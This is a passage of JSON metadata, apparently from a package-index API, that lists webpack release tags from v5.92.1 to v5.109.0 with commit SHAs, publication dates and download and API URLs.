hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://c